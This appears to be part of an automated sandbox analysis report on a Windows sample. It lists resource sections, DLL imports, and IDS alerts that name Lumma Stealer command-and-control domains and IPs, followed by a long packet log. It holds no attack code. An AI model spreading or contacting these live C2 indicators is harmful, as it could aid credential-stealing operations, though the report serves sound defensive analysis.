                                                                                                                                                                                                                                                              RT_ICON0x4341380x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4096TurkmenTurkmenistan0.4910881801125704
                                                                                                                                                                                                                                                              RT_ICON0x4351e00x988Device independent bitmap graphic, 24 x 48 x 32, image size 2304TurkmenTurkmenistan0.48565573770491804
                                                                                                                                                                                                                                                              RT_ICON0x435b680x468Device independent bitmap graphic, 16 x 32 x 32, image size 1024TurkmenTurkmenistan0.5957446808510638
                                                                                                                                                                                                                                                              RT_ICON0x4360480xea8Device independent bitmap graphic, 48 x 96 x 8, image size 0TurkmenTurkmenistan0.35287846481876334
                                                                                                                                                                                                                                                              RT_ICON0x436ef00x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 0TurkmenTurkmenistan0.5040613718411552
                                                                                                                                                                                                                                                              RT_ICON0x4377980x6c8Device independent bitmap graphic, 24 x 48 x 8, image size 0TurkmenTurkmenistan0.5737327188940092
                                                                                                                                                                                                                                                              RT_ICON0x437e600x568Device independent bitmap graphic, 16 x 32 x 8, image size 0TurkmenTurkmenistan0.6098265895953757
                                                                                                                                                                                                                                                              RT_ICON0x4383c80x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0TurkmenTurkmenistan0.34380863039399623
                                                                                                                                                                                                                                                              RT_ICON0x4394700x988Device independent bitmap graphic, 24 x 48 x 32, image size 0TurkmenTurkmenistan0.33811475409836067
                                                                                                                                                                                                                                                              RT_ICON0x439df80x468Device independent bitmap graphic, 16 x 32 x 32, image size 0TurkmenTurkmenistan0.39361702127659576
                                                                                                                                                                                                                                                              RT_ICON0x43a2c80xea8Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colorsTurkmenTurkmenistan0.8121002132196162
                                                                                                                                                                                                                                                              RT_ICON0x43b1700x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colorsTurkmenTurkmenistan0.8465703971119134
                                                                                                                                                                                                                                                              RT_ICON0x43ba180x6c8Device independent bitmap graphic, 24 x 48 x 8, image size 576, 256 important colorsTurkmenTurkmenistan0.8271889400921659
                                                                                                                                                                                                                                                              RT_ICON0x43c0e00x568Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colorsTurkmenTurkmenistan0.8395953757225434
                                                                                                                                                                                                                                                              RT_ICON0x43c6480x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9216TurkmenTurkmenistan0.8026970954356847
                                                                                                                                                                                                                                                              RT_ICON0x43ebf00x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4096TurkmenTurkmenistan0.8332551594746717
                                                                                                                                                                                                                                                              RT_ICON0x43fc980x988Device independent bitmap graphic, 24 x 48 x 32, image size 2304TurkmenTurkmenistan0.844672131147541
                                                                                                                                                                                                                                                              RT_ICON0x4406200x468Device independent bitmap graphic, 16 x 32 x 32, image size 1024TurkmenTurkmenistan0.8625886524822695
                                                                                                                                                                                                                                                              RT_STRING0x441b980x4fedata0.43661971830985913
                                                                                                                                                                                                                                                              RT_STRING0x4420980x66data0.6862745098039216
                                                                                                                                                                                                                                                              RT_STRING0x4421000x776data0.42670157068062825
                                                                                                                                                                                                                                                              RT_STRING0x4428780x54cdata0.4476401179941003
                                                                                                                                                                                                                                                              RT_STRING0x442dc80x7e0data0.42162698412698413
                                                                                                                                                                                                                                                              RT_STRING0x4435a80x6dadata0.4298745724059293
                                                                                                                                                                                                                                                              RT_STRING0x443c880x756data0.422790202342918
                                                                                                                                                                                                                                                              RT_STRING0x4443e00x63cdata0.43796992481203006
                                                                                                                                                                                                                                                              RT_STRING0x444a200x5fadata0.43790849673202614
                                                                                                                                                                                                                                                              RT_ACCELERATOR0x440b000x20data1.15625
                                                                                                                                                                                                                                                              RT_GROUP_CURSOR0x4419c80x14data1.25
                                                                                                                                                                                                                                                              RT_GROUP_ICON0x440a880x76dataTurkmenTurkmenistan0.6694915254237288
                                                                                                                                                                                                                                                              RT_GROUP_ICON0x43a2600x68dataTurkmenTurkmenistan0.7115384615384616
                                                                                                                                                                                                                                                              RT_GROUP_ICON0x435fd00x76dataTurkmenTurkmenistan0.6610169491525424
                                                                                                                                                                                                                                                              RT_VERSION0x4419e00x1b4data0.5665137614678899
                                                                                                                                                                                                                                                              DLLImport
                                                                                                                                                                                                                                                              KERNEL32.dllSetDefaultCommConfigA, SetLocaleInfoA, GetNumaProcessorNode, DeleteVolumeMountPointA, InterlockedIncrement, InterlockedDecrement, SetComputerNameW, GetProcessPriorityBoost, GetModuleHandleW, GetEnvironmentStrings, LoadLibraryW, GetVersionExW, GetTimeFormatW, GetConsoleAliasW, GetFileAttributesW, GetStartupInfoA, SetLastError, GetProcAddress, UnregisterWait, BuildCommDCBW, ResetEvent, LoadLibraryA, Process32Next, LocalAlloc, GetFileType, AddAtomW, FoldStringW, GetModuleFileNameA, GetModuleHandleA, UpdateResourceW, OpenFileMappingW, WriteConsoleOutputAttribute, WriteProcessMemory, SetFileAttributesA, GetCommandLineW, CreateFileA, WriteConsoleW, MultiByteToWideChar, GetCommandLineA, TerminateProcess, GetCurrentProcess, UnhandledExceptionFilter, SetUnhandledExceptionFilter, IsDebuggerPresent, EnterCriticalSection, LeaveCriticalSection, SetHandleCount, GetStdHandle, DeleteCriticalSection, TlsGetValue, TlsAlloc, TlsSetValue, TlsFree, GetCurrentThreadId, GetLastError, Sleep, HeapSize, ExitProcess, GetCPInfo, GetACP, GetOEMCP, IsValidCodePage, WriteFile, FreeEnvironmentStringsA, FreeEnvironmentStringsW, WideCharToMultiByte, GetEnvironmentStringsW, HeapCreate, VirtualFree, HeapFree, QueryPerformanceCounter, GetTickCount, GetCurrentProcessId, GetSystemTimeAsFileTime, ReadFile, InitializeCriticalSectionAndSpinCount, RtlUnwind, HeapAlloc, HeapReAlloc, VirtualAlloc, LCMapStringA, LCMapStringW, GetStringTypeA, GetStringTypeW, GetLocaleInfoA, GetConsoleCP, GetConsoleMode, FlushFileBuffers, SetFilePointer, SetStdHandle, CloseHandle, WriteConsoleA, GetConsoleOutputCP
                                                                                                                                                                                                                                                              USER32.dllGetProcessDefaultLayout
                                                                                                                                                                                                                                                              GDI32.dllGetBitmapBits
                                                                                                                                                                                                                                                              Language of compilation systemCountry where language is spokenMap
                                                                                                                                                                                                                                                              TurkmenTurkmenistan
                                                                                                                                                                                                                                                              TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                                                                                                                                                                              2024-12-14T14:12:46.131119+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.449730172.67.179.207443TCP
                                                                                                                                                                                                                                                              2024-12-14T14:12:47.868178+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.449731176.113.115.1980TCP
                                                                                                                                                                                                                                                              2024-12-14T14:12:52.521399+01002058226ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (sordid-snaked .cyou)1192.168.2.4526441.1.1.153UDP
                                                                                                                                                                                                                                                              2024-12-14T14:12:52.661007+01002058222ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (immureprech .biz)1192.168.2.4529481.1.1.153UDP
                                                                                                                                                                                                                                                              2024-12-14T14:12:54.029381+01002058223ET MALWARE Observed Win32/Lumma Stealer Related Domain (immureprech .biz in TLS SNI)1192.168.2.449732104.21.22.222443TCP
                                                                                                                                                                                                                                                              2024-12-14T14:12:54.029381+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449732104.21.22.222443TCP
                                                                                                                                                                                                                                                              2024-12-14T14:12:56.157822+01002049836ET MALWARE Lumma Stealer Related Activity1192.168.2.449732104.21.22.222443TCP
                                                                                                                                                                                                                                                              2024-12-14T14:12:56.157822+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.449732104.21.22.222443TCP
                                                                                                                                                                                                                                                              2024-12-14T14:12:56.173425+01002058214ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (deafeninggeh .biz)1192.168.2.4600881.1.1.153UDP
                                                                                                                                                                                                                                                              2024-12-14T14:12:57.535218+01002058215ET MALWARE Observed Win32/Lumma Stealer Related Domain (deafeninggeh .biz in TLS SNI)1192.168.2.449733104.21.96.1443TCP
                                                                                                                                                                                                                                                              2024-12-14T14:12:57.535218+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449733104.21.96.1443TCP
                                                                                                                                                                                                                                                              2024-12-14T14:12:59.016757+01002049836ET MALWARE Lumma Stealer Related Activity1192.168.2.449733104.21.96.1443TCP
                                                                                                                                                                                                                                                              2024-12-14T14:12:59.016757+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.449733104.21.96.1443TCP
                                                                                                                                                                                                                                                              2024-12-14T14:12:59.018983+01002058220ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (effecterectz .xyz)1192.168.2.4631841.1.1.153UDP
                                                                                                                                                                                                                                                              2024-12-14T14:12:59.179780+01002058218ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (diffuculttan .xyz)1192.168.2.4642771.1.1.153UDP
                                                                                                                                                                                                                                                              2024-12-14T14:12:59.324973+01002058216ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (debonairnukk .xyz)1192.168.2.4514811.1.1.153UDP
                                                                                                                                                                                                                                                              2024-12-14T14:12:59.503865+01002058236ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (wrathful-jammy .cyou)1192.168.2.4639531.1.1.153UDP
                                                                                                                                                                                                                                                              2024-12-14T14:12:59.656713+01002058210ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (awake-weaves .cyou)1192.168.2.4561481.1.1.153UDP
                                                                                                                                                                                                                                                              2024-12-14T14:12:59.797862+01002058226ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (sordid-snaked .cyou)1192.168.2.4653931.1.1.153UDP
                                                                                                                                                                                                                                                              2024-12-14T14:13:01.486388+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.44973523.55.153.106443TCP
                                                                                                                                                                                                                                                              2024-12-14T14:13:02.327356+01002858666ETPRO MALWARE Win32/Lumma Stealer Steam Profile Lookup1192.168.2.44973523.55.153.106443TCP
                                                                                                                                                                                                                                                              TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                                                                              Dec 14, 2024 14:12:44.237211943 CET49730443192.168.2.4172.67.179.207
                                                                                                                                                                                                                                                              Dec 14, 2024 14:12:44.237261057 CET44349730172.67.179.207192.168.2.4
                                                                                                                                                                                                                                                              Dec 14, 2024 14:12:44.237356901 CET49730443192.168.2.4172.67.179.207
                                                                                                                                                                                                                                                              Dec 14, 2024 14:12:44.248621941 CET49730443192.168.2.4172.67.179.207
                                                                                                                                                                                                                                                              Dec 14, 2024 14:12:44.248660088 CET44349730172.67.179.207192.168.2.4
                                                                                                                                                                                                                                                              Dec 14, 2024 14:12:45.466943979 CET44349730172.67.179.207192.168.2.4
                                                                                                                                                                                                                                                              Dec 14, 2024 14:12:45.467015028 CET49730443192.168.2.4172.67.179.207
                                                                                                                                                                                                                                                              Dec 14, 2024 14:12:45.548891068 CET49730443192.168.2.4172.67.179.207
                                                                                                                                                                                                                                                              Dec 14, 2024 14:12:45.548909903 CET44349730172.67.179.207192.168.2.4
                                                                                                                                                                                                                                                              Dec 14, 2024 14:12:45.549216986 CET44349730172.67.179.207192.168.2.4
                                                                                                                                                                                                                                                              Dec 14, 2024 14:12:45.549261093 CET49730443192.168.2.4172.67.179.207
                                                                                                                                                                                                                                                              Dec 14, 2024 14:12:45.552670002 CET49730443192.168.2.4172.67.179.207
                                                                                                                                                                                                                                                              Dec 14, 2024 14:12:45.595324039 CET44349730172.67.179.207192.168.2.4
                                                                                                                                                                                                                                                              Dec 14, 2024 14:12:46.131145954 CET44349730172.67.179.207192.168.2.4
                                                                                                                                                                                                                                                              Dec 14, 2024 14:12:46.131218910 CET49730443192.168.2.4172.67.179.207
                                                                                                                                                                                                                                                              Dec 14, 2024 14:12:46.131241083 CET44349730172.67.179.207192.168.2.4
                                                                                                                                                                                                                                                              Dec 14, 2024 14:12:46.131284952 CET49730443192.168.2.4172.67.179.207
                                                                                                                                                                                                                                                              Dec 14, 2024 14:12:46.137761116 CET49730443192.168.2.4172.67.179.207
                                                                                                                                                                                                                                                              Dec 14, 2024 14:12:46.137788057 CET44349730172.67.179.207192.168.2.4
                                                                                                                                                                                                                                                              Dec 14, 2024 14:12:46.137801886 CET49730443192.168.2.4172.67.179.207
                                                                                                                                                                                                                                                              Dec 14, 2024 14:12:46.137834072 CET49730443192.168.2.4172.67.179.207
                                                                                                                                                                                                                                                              Dec 14, 2024 14:12:46.396420002 CET4973180192.168.2.4176.113.115.19
                                                                                                                                                                                                                                                              Dec 14, 2024 14:12:46.516578913 CET8049731176.113.115.19192.168.2.4
                                                                                                                                                                                                                                                              Dec 14, 2024 14:12:46.516732931 CET4973180192.168.2.4176.113.115.19
                                                                                                                                                                                                                                                              Dec 14, 2024 14:12:46.516954899 CET4973180192.168.2.4176.113.115.19
                                                                                                                                                                                                                                                              Dec 14, 2024 14:12:46.640424967 CET8049731176.113.115.19192.168.2.4
                                                                                                                                                                                                                                                              Dec 14, 2024 14:12:47.867899895 CET8049731176.113.115.19192.168.2.4
                                                                                                                                                                                                                                                              Dec 14, 2024 14:12:47.867947102 CET8049731176.113.115.19192.168.2.4
                                                                                                                                                                                                                                                              Dec 14, 2024 14:12:47.867964029 CET8049731176.113.115.19192.168.2.4
                                                                                                                                                                                                                                                              Dec 14, 2024 14:12:47.868177891 CET4973180192.168.2.4176.113.115.19
                                                                                                                                                                                                                                                              Dec 14, 2024 14:12:47.868179083 CET4973180192.168.2.4176.113.115.19
                                                                                                                                                                                                                                                              Dec 14, 2024 14:12:47.873892069 CET8049731176.113.115.19192.168.2.4
                                                                                                                                                                                                                                                              Dec 14, 2024 14:12:47.875283957 CET4973180192.168.2.4176.113.115.19
                                                                                                                                                                                                                                                              Dec 14, 2024 14:12:47.987637997 CET8049731176.113.115.19192.168.2.4
                                                                                                                                                                                                                                                              Dec 14, 2024 14:12:47.987704992 CET8049731176.113.115.19192.168.2.4
                                                                                                                                                                                                                                                              Dec 14, 2024 14:12:47.987741947 CET8049731176.113.115.19192.168.2.4
                                                                                                                                                                                                                                                              Dec 14, 2024 14:12:47.987749100 CET4973180192.168.2.4176.113.115.19
                                                                                                                                                                                                                                                              Dec 14, 2024 14:12:47.987749100 CET4973180192.168.2.4176.113.115.19
                                                                                                                                                                                                                                                              Dec 14, 2024 14:12:47.987776041 CET8049731176.113.115.19192.168.2.4
                                                                                                                                                                                                                                                              Dec 14, 2024 14:12:47.987808943 CET8049731176.113.115.19192.168.2.4
                                                                                                                                                                                                                                                              Dec 14, 2024 14:12:47.987814903 CET4973180192.168.2.4176.113.115.19
                                                                                                                                                                                                                                                              Dec 14, 2024 14:12:47.987814903 CET4973180192.168.2.4176.113.115.19
                                                                                                                                                                                                                                                              Dec 14, 2024 14:12:47.987845898 CET8049731176.113.115.19192.168.2.4
                                                                                                                                                                                                                                                              Dec 14, 2024 14:12:47.987883091 CET4973180192.168.2.4176.113.115.19
                                                                                                                                                                                                                                                              Dec 14, 2024 14:12:47.987883091 CET4973180192.168.2.4176.113.115.19
                                                                                                                                                                                                                                                              Dec 14, 2024 14:12:47.988058090 CET8049731176.113.115.19192.168.2.4
                                                                                                                                                                                                                                                              Dec 14, 2024 14:12:47.988102913 CET4973180192.168.2.4176.113.115.19
                                                                                                                                                                                                                                                              Dec 14, 2024 14:12:47.988176107 CET8049731176.113.115.19192.168.2.4
                                                                                                                                                                                                                                                              Dec 14, 2024 14:12:47.988224983 CET4973180192.168.2.4176.113.115.19
                                                                                                                                                                                                                                                              Dec 14, 2024 14:12:47.992392063 CET8049731176.113.115.19192.168.2.4
                                                                                                                                                                                                                                                              Dec 14, 2024 14:12:47.992443085 CET8049731176.113.115.19192.168.2.4
                                                                                                                                                                                                                                                              Dec 14, 2024 14:12:47.992465019 CET4973180192.168.2.4176.113.115.19
                                                                                                                                                                                                                                                              Dec 14, 2024 14:12:47.992513895 CET4973180192.168.2.4176.113.115.19
                                                                                                                                                                                                                                                              Dec 14, 2024 14:12:48.060075045 CET8049731176.113.115.19192.168.2.4
                                                                                                                                                                                                                                                              Dec 14, 2024 14:12:48.060113907 CET8049731176.113.115.19192.168.2.4
                                                                                                                                                                                                                                                              Dec 14, 2024 14:12:48.060216904 CET4973180192.168.2.4176.113.115.19
                                                                                                                                                                                                                                                              Dec 14, 2024 14:12:48.060216904 CET4973180192.168.2.4176.113.115.19
                                                                                                                                                                                                                                                              Dec 14, 2024 14:12:48.064380884 CET8049731176.113.115.19192.168.2.4
                                                                                                                                                                                                                                                              Dec 14, 2024 14:12:48.064486027 CET4973180192.168.2.4176.113.115.19
                                                                                                                                                                                                                                                              Dec 14, 2024 14:12:48.064517021 CET8049731176.113.115.19192.168.2.4
                                                                                                                                                                                                                                                              Dec 14, 2024 14:12:48.064625025 CET4973180192.168.2.4176.113.115.19
                                                                                                                                                                                                                                                              Dec 14, 2024 14:12:48.107873917 CET8049731176.113.115.19192.168.2.4
                                                                                                                                                                                                                                                              Dec 14, 2024 14:12:48.107911110 CET8049731176.113.115.19192.168.2.4
                                                                                                                                                                                                                                                              Dec 14, 2024 14:12:48.107933998 CET4973180192.168.2.4176.113.115.19
                                                                                                                                                                                                                                                              Dec 14, 2024 14:12:48.107990026 CET4973180192.168.2.4176.113.115.19
                                                                                                                                                                                                                                                              Dec 14, 2024 14:12:48.112078905 CET8049731176.113.115.19192.168.2.4
                                                                                                                                                                                                                                                              Dec 14, 2024 14:12:48.112178087 CET4973180192.168.2.4176.113.115.19
                                                                                                                                                                                                                                                              Dec 14, 2024 14:12:48.112181902 CET8049731176.113.115.19192.168.2.4
                                                                                                                                                                                                                                                              Dec 14, 2024 14:12:48.112678051 CET4973180192.168.2.4176.113.115.19
                                                                                                                                                                                                                                                              Dec 14, 2024 14:12:48.120799065 CET8049731176.113.115.19192.168.2.4
                                                                                                                                                                                                                                                              Dec 14, 2024 14:12:48.120861053 CET4973180192.168.2.4176.113.115.19
                                                                                                                                                                                                                                                              Dec 14, 2024 14:12:48.120924950 CET8049731176.113.115.19192.168.2.4
                                                                                                                                                                                                                                                              Dec 14, 2024 14:12:48.120978117 CET4973180192.168.2.4176.113.115.19
                                                                                                                                                                                                                                                              Dec 14, 2024 14:12:48.129496098 CET8049731176.113.115.19192.168.2.4
                                                                                                                                                                                                                                                              Dec 14, 2024 14:12:48.129518032 CET8049731176.113.115.19192.168.2.4
                                                                                                                                                                                                                                                              Dec 14, 2024 14:12:48.129565954 CET4973180192.168.2.4176.113.115.19
                                                                                                                                                                                                                                                              Dec 14, 2024 14:12:48.129565954 CET4973180192.168.2.4176.113.115.19
                                                                                                                                                                                                                                                              Dec 14, 2024 14:12:48.137217045 CET8049731176.113.115.19192.168.2.4
                                                                                                                                                                                                                                                              Dec 14, 2024 14:12:48.137274981 CET8049731176.113.115.19192.168.2.4
                                                                                                                                                                                                                                                              Dec 14, 2024 14:12:48.137279034 CET4973180192.168.2.4176.113.115.19
                                                                                                                                                                                                                                                              Dec 14, 2024 14:12:48.137428045 CET4973180192.168.2.4176.113.115.19
                                                                                                                                                                                                                                                              Dec 14, 2024 14:12:48.144856930 CET8049731176.113.115.19192.168.2.4
                                                                                                                                                                                                                                                              Dec 14, 2024 14:12:48.144943953 CET4973180192.168.2.4176.113.115.19
                                                                                                                                                                                                                                                              Dec 14, 2024 14:12:48.145047903 CET8049731176.113.115.19192.168.2.4
                                                                                                                                                                                                                                                              Dec 14, 2024 14:12:48.145164967 CET4973180192.168.2.4176.113.115.19
                                                                                                                                                                                                                                                              Dec 14, 2024 14:12:48.152498960 CET8049731176.113.115.19192.168.2.4
                                                                                                                                                                                                                                                              Dec 14, 2024 14:12:48.152560949 CET8049731176.113.115.19192.168.2.4
                                                                                                                                                                                                                                                              Dec 14, 2024 14:12:48.152575970 CET4973180192.168.2.4176.113.115.19
                                                                                                                                                                                                                                                              Dec 14, 2024 14:12:48.152631998 CET4973180192.168.2.4176.113.115.19
                                                                                                                                                                                                                                                              Dec 14, 2024 14:12:48.160157919 CET8049731176.113.115.19192.168.2.4
                                                                                                                                                                                                                                                              Dec 14, 2024 14:12:48.160218000 CET4973180192.168.2.4176.113.115.19
                                                                                                                                                                                                                                                              Dec 14, 2024 14:12:48.160290956 CET8049731176.113.115.19192.168.2.4
                                                                                                                                                                                                                                                              Dec 14, 2024 14:12:48.160379887 CET4973180192.168.2.4176.113.115.19
                                                                                                                                                                                                                                                              Dec 14, 2024 14:12:48.167757988 CET8049731176.113.115.19192.168.2.4
                                                                                                                                                                                                                                                              Dec 14, 2024 14:12:48.167861938 CET4973180192.168.2.4176.113.115.19
                                                                                                                                                                                                                                                              Dec 14, 2024 14:12:48.167901039 CET8049731176.113.115.19192.168.2.4
                                                                                                                                                                                                                                                              Dec 14, 2024 14:12:48.167944908 CET4973180192.168.2.4176.113.115.19
                                                                                                                                                                                                                                                              Dec 14, 2024 14:12:48.175391912 CET8049731176.113.115.19192.168.2.4
                                                                                                                                                                                                                                                              Dec 14, 2024 14:12:48.175496101 CET8049731176.113.115.19192.168.2.4
                                                                                                                                                                                                                                                              Dec 14, 2024 14:12:48.175568104 CET4973180192.168.2.4176.113.115.19
                                                                                                                                                                                                                                                              Dec 14, 2024 14:12:48.175568104 CET4973180192.168.2.4176.113.115.19
                                                                                                                                                                                                                                                              Dec 14, 2024 14:12:48.251912117 CET8049731176.113.115.19192.168.2.4
                                                                                                                                                                                                                                                              Dec 14, 2024 14:12:48.251982927 CET8049731176.113.115.19192.168.2.4
                                                                                                                                                                                                                                                              Dec 14, 2024 14:12:48.252028942 CET4973180192.168.2.4176.113.115.19
                                                                                                                                                                                                                                                              Dec 14, 2024 14:12:48.252028942 CET4973180192.168.2.4176.113.115.19
                                                                                                                                                                                                                                                              Dec 14, 2024 14:12:48.255459070 CET8049731176.113.115.19192.168.2.4
                                                                                                                                                                                                                                                              Dec 14, 2024 14:12:48.255539894 CET4973180192.168.2.4176.113.115.19
                                                                                                                                                                                                                                                              Dec 14, 2024 14:12:48.255569935 CET8049731176.113.115.19192.168.2.4
                                                                                                                                                                                                                                                              Dec 14, 2024 14:12:48.255656004 CET4973180192.168.2.4176.113.115.19
                                                                                                                                                                                                                                                              Dec 14, 2024 14:12:48.262495995 CET8049731176.113.115.19192.168.2.4
                                                                                                                                                                                                                                                              Dec 14, 2024 14:12:48.262650013 CET4973180192.168.2.4176.113.115.19
                                                                                                                                                                                                                                                              Dec 14, 2024 14:12:48.262681007 CET8049731176.113.115.19192.168.2.4
                                                                                                                                                                                                                                                              Dec 14, 2024 14:12:48.262799025 CET4973180192.168.2.4176.113.115.19
                                                                                                                                                                                                                                                              Dec 14, 2024 14:12:48.269560099 CET8049731176.113.115.19192.168.2.4
                                                                                                                                                                                                                                                              Dec 14, 2024 14:12:48.269659042 CET4973180192.168.2.4176.113.115.19
                                                                                                                                                                                                                                                              Dec 14, 2024 14:12:48.269678116 CET8049731176.113.115.19192.168.2.4
                                                                                                                                                                                                                                                              Dec 14, 2024 14:12:48.269797087 CET4973180192.168.2.4176.113.115.19
                                                                                                                                                                                                                                                              Dec 14, 2024 14:12:48.276624918 CET8049731176.113.115.19192.168.2.4
                                                                                                                                                                                                                                                              Dec 14, 2024 14:12:48.276741982 CET8049731176.113.115.19192.168.2.4
                                                                                                                                                                                                                                                              Dec 14, 2024 14:12:48.276786089 CET4973180192.168.2.4176.113.115.19
                                                                                                                                                                                                                                                              Dec 14, 2024 14:12:48.276786089 CET4973180192.168.2.4176.113.115.19
                                                                                                                                                                                                                                                              Dec 14, 2024 14:12:48.283122063 CET8049731176.113.115.19192.168.2.4
                                                                                                                                                                                                                                                              Dec 14, 2024 14:12:48.283206940 CET4973180192.168.2.4176.113.115.19
                                                                                                                                                                                                                                                              Dec 14, 2024 14:12:48.283349991 CET8049731176.113.115.19192.168.2.4
                                                                                                                                                                                                                                                              Dec 14, 2024 14:12:48.283523083 CET4973180192.168.2.4176.113.115.19
                                                                                                                                                                                                                                                              Dec 14, 2024 14:12:48.289201021 CET8049731176.113.115.19192.168.2.4
                                                                                                                                                                                                                                                              Dec 14, 2024 14:12:48.289321899 CET8049731176.113.115.19192.168.2.4
                                                                                                                                                                                                                                                              Dec 14, 2024 14:12:48.289340019 CET4973180192.168.2.4176.113.115.19
                                                                                                                                                                                                                                                              Dec 14, 2024 14:12:48.289424896 CET4973180192.168.2.4176.113.115.19
                                                                                                                                                                                                                                                              Dec 14, 2024 14:12:48.294987917 CET8049731176.113.115.19192.168.2.4
                                                                                                                                                                                                                                                              Dec 14, 2024 14:12:48.295048952 CET8049731176.113.115.19192.168.2.4
                                                                                                                                                                                                                                                              Dec 14, 2024 14:12:48.295078039 CET4973180192.168.2.4176.113.115.19
                                                                                                                                                                                                                                                              Dec 14, 2024 14:12:48.295144081 CET4973180192.168.2.4176.113.115.19
                                                                                                                                                                                                                                                              Dec 14, 2024 14:12:48.300441980 CET8049731176.113.115.19192.168.2.4
                                                                                                                                                                                                                                                              Dec 14, 2024 14:12:48.300544024 CET8049731176.113.115.19192.168.2.4
                                                                                                                                                                                                                                                              Dec 14, 2024 14:12:48.300565004 CET4973180192.168.2.4176.113.115.19
                                                                                                                                                                                                                                                              Dec 14, 2024 14:12:48.300590992 CET4973180192.168.2.4176.113.115.19
                                                                                                                                                                                                                                                              Dec 14, 2024 14:12:48.305749893 CET8049731176.113.115.19192.168.2.4
                                                                                                                                                                                                                                                              Dec 14, 2024 14:12:48.305830002 CET8049731176.113.115.19192.168.2.4
                                                                                                                                                                                                                                                              Dec 14, 2024 14:12:48.305845976 CET4973180192.168.2.4176.113.115.19
                                                                                                                                                                                                                                                              Dec 14, 2024 14:12:48.305911064 CET4973180192.168.2.4176.113.115.19
                                                                                                                                                                                                                                                              Dec 14, 2024 14:12:48.311129093 CET8049731176.113.115.19192.168.2.4
                                                                                                                                                                                                                                                              Dec 14, 2024 14:12:48.311199903 CET4973180192.168.2.4176.113.115.19
                                                                                                                                                                                                                                                              Dec 14, 2024 14:12:48.311253071 CET8049731176.113.115.19192.168.2.4
                                                                                                                                                                                                                                                              Dec 14, 2024 14:12:48.311319113 CET4973180192.168.2.4176.113.115.19
                                                                                                                                                                                                                                                              Dec 14, 2024 14:12:48.316476107 CET8049731176.113.115.19192.168.2.4
                                                                                                                                                                                                                                                              Dec 14, 2024 14:12:48.316549063 CET4973180192.168.2.4176.113.115.19
                                                                                                                                                                                                                                                              Dec 14, 2024 14:12:48.316572905 CET8049731176.113.115.19192.168.2.4
                                                                                                                                                                                                                                                              Dec 14, 2024 14:12:48.316649914 CET4973180192.168.2.4176.113.115.19
                                                                                                                                                                                                                                                              Dec 14, 2024 14:12:48.321783066 CET8049731176.113.115.19192.168.2.4
                                                                                                                                                                                                                                                              Dec 14, 2024 14:12:48.321906090 CET8049731176.113.115.19192.168.2.4
                                                                                                                                                                                                                                                              Dec 14, 2024 14:12:48.321948051 CET4973180192.168.2.4176.113.115.19
                                                                                                                                                                                                                                                              Dec 14, 2024 14:12:48.321948051 CET4973180192.168.2.4176.113.115.19
                                                                                                                                                                                                                                                              Dec 14, 2024 14:12:48.327114105 CET8049731176.113.115.19192.168.2.4
                                                                                                                                                                                                                                                              Dec 14, 2024 14:12:48.327177048 CET4973180192.168.2.4176.113.115.19
                                                                                                                                                                                                                                                              Dec 14, 2024 14:12:48.327250004 CET8049731176.113.115.19192.168.2.4
                                                                                                                                                                                                                                                              Dec 14, 2024 14:12:48.327332020 CET4973180192.168.2.4176.113.115.19
                                                                                                                                                                                                                                                              Dec 14, 2024 14:12:48.332451105 CET8049731176.113.115.19192.168.2.4
                                                                                                                                                                                                                                                              Dec 14, 2024 14:12:48.332506895 CET4973180192.168.2.4176.113.115.19
                                                                                                                                                                                                                                                              Dec 14, 2024 14:12:48.332552910 CET8049731176.113.115.19192.168.2.4
                                                                                                                                                                                                                                                              Dec 14, 2024 14:12:48.332623005 CET4973180192.168.2.4176.113.115.19
                                                                                                                                                                                                                                                              Dec 14, 2024 14:12:48.337784052 CET8049731176.113.115.19192.168.2.4
                                                                                                                                                                                                                                                              Dec 14, 2024 14:12:48.337846994 CET8049731176.113.115.19192.168.2.4
                                                                                                                                                                                                                                                              Dec 14, 2024 14:12:48.337882996 CET4973180192.168.2.4176.113.115.19
                                                                                                                                                                                                                                                              Dec 14, 2024 14:12:48.337882996 CET4973180192.168.2.4176.113.115.19
                                                                                                                                                                                                                                                              Dec 14, 2024 14:12:48.343111992 CET8049731176.113.115.19192.168.2.4
                                                                                                                                                                                                                                                              Dec 14, 2024 14:12:48.343261957 CET8049731176.113.115.19192.168.2.4
                                                                                                                                                                                                                                                              Dec 14, 2024 14:12:48.343303919 CET4973180192.168.2.4176.113.115.19
                                                                                                                                                                                                                                                              Dec 14, 2024 14:12:48.343303919 CET4973180192.168.2.4176.113.115.19
                                                                                                                                                                                                                                                              Dec 14, 2024 14:12:48.348503113 CET8049731176.113.115.19192.168.2.4
                                                                                                                                                                                                                                                              Dec 14, 2024 14:12:48.348577023 CET8049731176.113.115.19192.168.2.4
                                                                                                                                                                                                                                                              Dec 14, 2024 14:12:48.348622084 CET4973180192.168.2.4176.113.115.19
                                                                                                                                                                                                                                                              Dec 14, 2024 14:12:48.348622084 CET4973180192.168.2.4176.113.115.19
                                                                                                                                                                                                                                                              Dec 14, 2024 14:12:48.353833914 CET8049731176.113.115.19192.168.2.4
